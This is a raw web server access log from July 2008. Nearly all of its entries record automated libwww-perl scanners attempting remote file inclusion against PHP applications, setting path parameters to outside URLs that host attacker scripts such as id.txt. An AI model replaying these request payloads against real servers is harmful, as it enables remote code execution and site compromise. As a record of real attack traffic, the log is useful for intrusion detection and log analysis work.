80.83.113.49 - - [29/Jul/2008:07:19:32 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.812"
207.44.234.103 - - [29/Jul/2008:07:20:14 -0500] "GET /logs/access_log.1214438400//include/write.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.811"
207.44.234.103 - - [29/Jul/2008:07:20:14 -0500] "GET //include/write.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
207.44.234.103 - - [29/Jul/2008:07:20:14 -0500] "GET /logs//include/write.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
207.44.234.103 - - [29/Jul/2008:07:22:45 -0500] "GET /logs//inc/download_center_lite.inc.php?script_root=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.811"
207.44.234.103 - - [29/Jul/2008:07:22:45 -0500] "GET //inc/download_center_lite.inc.php?script_root=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
194.79.75.195 - - [29/Jul/2008:07:22:50 -0500] "GET /logs/access_log.1214438400/?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:07:22:50 -0500] "GET /?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:07:22:51 -0500] "GET /logs/?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 93161 "-""libwww-perl/5.810"
88.86.110.83 - - [29/Jul/2008:07:22:55 -0500] "GET /logs//s_e404.php?DOCUMENT_ROOT=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
88.86.110.83 - - [29/Jul/2008:07:22:56 -0500] "GET //s_e404.php?DOCUMENT_ROOT=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
194.79.75.195 - - [29/Jul/2008:07:23:01 -0500] "GET /logs/access_log.1214438400/?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:07:23:01 -0500] "GET /logs/access_log.1214438400/?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:07:23:02 -0500] "GET /?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:07:23:02 -0500] "GET /?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:07:23:03 -0500] "GET /logs/?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 93161 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:07:23:03 -0500] "GET /logs/?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 93161 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:07:23:22 -0500] "GET /logs/access_log.1214438400/?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:07:23:23 -0500] "GET /?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:07:23:24 -0500] "GET /logs/?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 93161 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:07:23:36 -0500] "GET /logs/access_log.1214438400/?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:07:23:36 -0500] "GET /?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:07:23:37 -0500] "GET /logs/?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 93161 "-""libwww-perl/5.810"
67.15.70.45 - - [29/Jul/2008:07:23:56 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
67.15.70.45 - - [29/Jul/2008:07:23:56 -0500] "GET //index.php?INCLUDE_FOLDER=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
64.22.89.194 - - [29/Jul/2008:07:24:00 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
64.22.89.194 - - [29/Jul/2008:07:24:00 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.812"
67.15.70.45 - - [29/Jul/2008:07:24:02 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
67.15.70.45 - - [29/Jul/2008:07:24:02 -0500] "GET //index.php?INCLUDE_FOLDER=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
64.191.6.148 - - [29/Jul/2008:07:24:04 -0500] "GET /logs/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
64.191.6.148 - - [29/Jul/2008:07:24:04 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
64.38.22.250 - - [29/Jul/2008:07:24:53 -0500] "GET /logs//s_e404.php?DOCUMENT_ROOT=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
64.38.22.250 - - [29/Jul/2008:07:24:53 -0500] "GET //s_e404.php?DOCUMENT_ROOT=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
74.220.163.9 - - [29/Jul/2008:07:26:12 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
74.220.163.9 - - [29/Jul/2008:07:26:13 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
88.84.151.157 - - [29/Jul/2008:07:27:09 -0500] "GET /logs//index2php?mosConfig=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.84.151.157 - - [29/Jul/2008:07:27:09 -0500] "GET //index2php?mosConfig=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.38.22.250 - - [29/Jul/2008:07:28:20 -0500] "GET /logs//s_e404.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
64.38.22.250 - - [29/Jul/2008:07:28:20 -0500] "GET //s_e404.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
77.222.40.151 - - [29/Jul/2008:07:29:15 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.geocities.com/jembutzmu/albania.txt?? HTTP/1.1" 200 93166 "-""libwww-perl/5.805"
77.222.40.151 - - [29/Jul/2008:07:29:15 -0500] "GET //?path%5Bdocroot%5D=http://www.geocities.com/jembutzmu/albania.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
205.234.232.195 - - [29/Jul/2008:07:29:31 -0500] "GET //inc/download_center_lite.inc.php?script_root=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.812"
205.234.232.195 - - [29/Jul/2008:07:29:31 -0500] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.812"
69.94.28.54 - - [29/Jul/2008:07:30:19 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "-""-"
91.121.143.183 - - [29/Jul/2008:07:30:29 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
91.121.143.183 - - [29/Jul/2008:07:30:29 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
89.223.3.98 - - [29/Jul/2008:07:30:33 -0500] "GET /logs/access_log.1214438400%22%20%20lang=%22de%22%3ETomdolan.pconline.com%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1214438400&lp=de_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22de%22%3E...%201207785600//Neos_Chronos/header.php?base_folder=http:/www.tripi-ddl.com/video%20...%2048:57%20-0500]%20%22GET%20/logs//Neos_Chronos/header.php?base_folder=http:/www.tripi%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1214438400%3C/span%3E%20-%20%3Cem%3E525k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu7xZDI9IpgwAvd1XNyoA;_ylu=X3oDMTB0MWU5N3RrBHNlYwNzcgRwb3MDOTMyBGNvbG8DYWMyBHZ0aWQD/SIG=120ag979o/EXP=1217420761/**http%3a/spj.inlandpro.com/http_2_ss_feed.html//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 442 "-""libwww-perl/5.803"
89.223.3.98 - - [29/Jul/2008:07:30:38 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
88.86.110.83 - - [29/Jul/2008:07:30:41 -0500] "GET /logs//s_e404.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
88.86.110.83 - - [29/Jul/2008:07:30:41 -0500] "GET //s_e404.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
89.223.3.98 - - [29/Jul/2008:07:30:43 -0500] "GET /logs/access_log.1214438400%22%20%20lang=%22de%22%3ETomdolan.pconline.com%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1214438400&lp=de_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22de%22%3E...%201207785600//Neos_Chronos/header.php?base_folder=http:/www.tripi-ddl.com/video%20...%2048:57%20-0500]%20%22GET%20/logs//Neos_Chronos/header.php?base_folder=http:/www.tripi%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1214438400%3C/span%3E%20-%20%3Cem%3E525k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu7xZDI9IpgwAvd1XNyoA;_ylu=X3oDMTB0MWU5N3RrBHNlYwNzcgRwb3MDOTMyBGNvbG8DYWMyBHZ0aWQD/SIG=120ag979o/EXP=1217420761/**http%3a/spj.inlandpro.com//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 442 "-""libwww-perl/5.803"
91.121.143.183 - - [29/Jul/2008:07:30:49 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
91.121.143.183 - - [29/Jul/2008:07:30:50 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
200.99.76.3 - - [29/Jul/2008:07:30:56 -0500] "GET /logs/access_log.1214438400/?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
200.99.76.3 - - [29/Jul/2008:07:30:57 -0500] "GET /?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
200.99.76.3 - - [29/Jul/2008:07:30:58 -0500] "GET /logs/?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 93161 "-""libwww-perl/5.79"
77.222.40.151 - - [29/Jul/2008:07:31:30 -0500] "GET /logs/errors.php?error=http://www.geocities.com/jembutzmu/albania.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.222.40.151 - - [29/Jul/2008:07:31:30 -0500] "GET /errors.php?error=http://www.geocities.com/jembutzmu/albania.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.222.40.197 - - [29/Jul/2008:07:32:18 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
77.222.40.197 - - [29/Jul/2008:07:32:18 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
77.222.40.197 - - [29/Jul/2008:07:32:20 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
77.222.40.197 - - [29/Jul/2008:07:32:21 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
80.93.56.169 - - [29/Jul/2008:07:32:27 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
80.93.56.169 - - [29/Jul/2008:07:32:28 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
64.38.22.250 - - [29/Jul/2008:07:32:36 -0500] "GET /logs//reports/errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
64.38.22.250 - - [29/Jul/2008:07:32:36 -0500] "GET //reports/errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.811"
207.44.230.33 - - [29/Jul/2008:07:32:36 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
207.44.230.33 - - [29/Jul/2008:07:32:36 -0500] "GET //e404.php?DOCUMENT_ROOT=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.118.110.139 - - [29/Jul/2008:07:32:38 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
87.118.110.139 - - [29/Jul/2008:07:32:43 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
38.117.65.239 - - [29/Jul/2008:07:33:38 -0500] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
38.117.65.239 - - [29/Jul/2008:07:33:38 -0500] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
64.191.6.148 - - [29/Jul/2008:07:33:55 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.812"
64.191.6.148 - - [29/Jul/2008:07:33:55 -0500] "GET /phphtml.php?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.812"
64.191.6.148 - - [29/Jul/2008:07:33:55 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.812"
88.84.151.157 - - [29/Jul/2008:07:35:27 -0500] "GET /logs/access_log.1212883200//index2.php?mosConfig_live_site=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
88.84.151.157 - - [29/Jul/2008:07:35:27 -0500] "GET //index2.php?mosConfig_live_site=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
88.84.151.157 - - [29/Jul/2008:07:35:28 -0500] "GET /logs//index2.php?mosConfig_live_site=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
200.99.76.3 - - [29/Jul/2008:07:35:57 -0500] "GET /logs/access_log.1214438400/?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
200.99.76.3 - - [29/Jul/2008:07:35:57 -0500] "GET /?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
200.99.76.3 - - [29/Jul/2008:07:35:59 -0500] "GET /logs/?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 200 93161 "-""libwww-perl/5.79"
38.117.65.239 - - [29/Jul/2008:07:36:03 -0500] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
38.117.65.239 - - [29/Jul/2008:07:36:03 -0500] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
204.10.38.130 - - [29/Jul/2008:07:37:05 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
204.10.38.130 - - [29/Jul/2008:07:37:05 -0500] "GET //e404.php?DOCUMENT_ROOT=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
89.108.64.53 - - [29/Jul/2008:07:37:28 -0500] "GET /logs//index.php?mosConfig=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
89.108.64.53 - - [29/Jul/2008:07:37:31 -0500] "GET //index.php?mosConfig=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
88.86.110.83 - - [29/Jul/2008:07:37:46 -0500] "GET /logs//reports/errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
88.86.110.83 - - [29/Jul/2008:07:37:47 -0500] "GET //reports/errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.803"
77.222.40.151 - - [29/Jul/2008:07:38:02 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.222.40.151 - - [29/Jul/2008:07:38:03 -0500] "GET //e404.php?DOCUMENT_ROOT=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.44.234.103 - - [29/Jul/2008:07:38:04 -0500] "GET /logs/access_log.1214438400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.811"
207.44.234.103 - - [29/Jul/2008:07:38:04 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
207.44.234.103 - - [29/Jul/2008:07:38:04 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
207.44.234.103 - - [29/Jul/2008:07:38:04 -0500] "GET /logs/access_log.1212883200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.811"
77.222.40.151 - - [29/Jul/2008:07:38:26 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.geocities.com/jembutzmu/albania.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.222.40.151 - - [29/Jul/2008:07:38:27 -0500] "GET //e404.php?DOCUMENT_ROOT=http://www.geocities.com/jembutzmu/albania.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.59.181.100 - - [29/Jul/2008:07:38:38 -0500] "GET /logs/access_log.1214438400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
69.59.181.100 - - [29/Jul/2008:07:38:38 -0500] "GET /logs/access_log.1214438400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
69.59.181.100 - - [29/Jul/2008:07:38:38 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
69.59.181.100 - - [29/Jul/2008:07:38:38 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
69.59.181.100 - - [29/Jul/2008:07:38:38 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
69.59.181.100 - - [29/Jul/2008:07:38:38 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
77.222.40.151 - - [29/Jul/2008:07:39:53 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.222.40.151 - - [29/Jul/2008:07:39:54 -0500] "GET //e404.php?DOCUMENT_ROOT=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.222.40.151 - - [29/Jul/2008:07:40:08 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.geocities.com/jembutzmu/albania.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.222.40.151 - - [29/Jul/2008:07:40:09 -0500] "GET //e404.php?DOCUMENT_ROOT=http://www.geocities.com/jembutzmu/albania.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
66.63.166.23 - - [29/Jul/2008:07:40:50 -0500] "GET /logs//s_e404.php?DOCUMENT_ROOT=http://www.brazebo.it/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.68"
66.63.166.23 - - [29/Jul/2008:07:40:50 -0500] "GET //s_e404.php?DOCUMENT_ROOT=http://www.brazebo.it/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.68"
88.84.151.157 - - [29/Jul/2008:07:41:07 -0500] "GET /logs//index2.php?mosConfig=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
88.84.151.157 - - [29/Jul/2008:07:41:08 -0500] "GET //index2.php?mosConfig=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
67.15.70.45 - - [29/Jul/2008:07:42:08 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
67.15.70.45 - - [29/Jul/2008:07:42:08 -0500] "GET //e404.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
64.191.6.148 - - [29/Jul/2008:07:42:14 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.812"
64.191.6.148 - - [29/Jul/2008:07:42:14 -0500] "GET /phphtml.php?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.812"
64.191.6.148 - - [29/Jul/2008:07:42:14 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.812"
67.15.70.45 - - [29/Jul/2008:07:42:18 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
67.15.70.45 - - [29/Jul/2008:07:42:18 -0500] "GET //e404.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
88.84.151.157 - - [29/Jul/2008:07:42:50 -0500] "GET /logs/access_log.1214438400//errors.php?error=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
88.84.151.157 - - [29/Jul/2008:07:42:50 -0500] "GET //errors.php?error=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
88.84.151.157 - - [29/Jul/2008:07:42:51 -0500] "GET /logs//errors.php?error=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.223.3.98 - - [29/Jul/2008:07:43:48 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
89.223.3.98 - - [29/Jul/2008:07:43:49 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
89.223.3.98 - - [29/Jul/2008:07:43:49 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
89.223.3.98 - - [29/Jul/2008:07:43:49 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
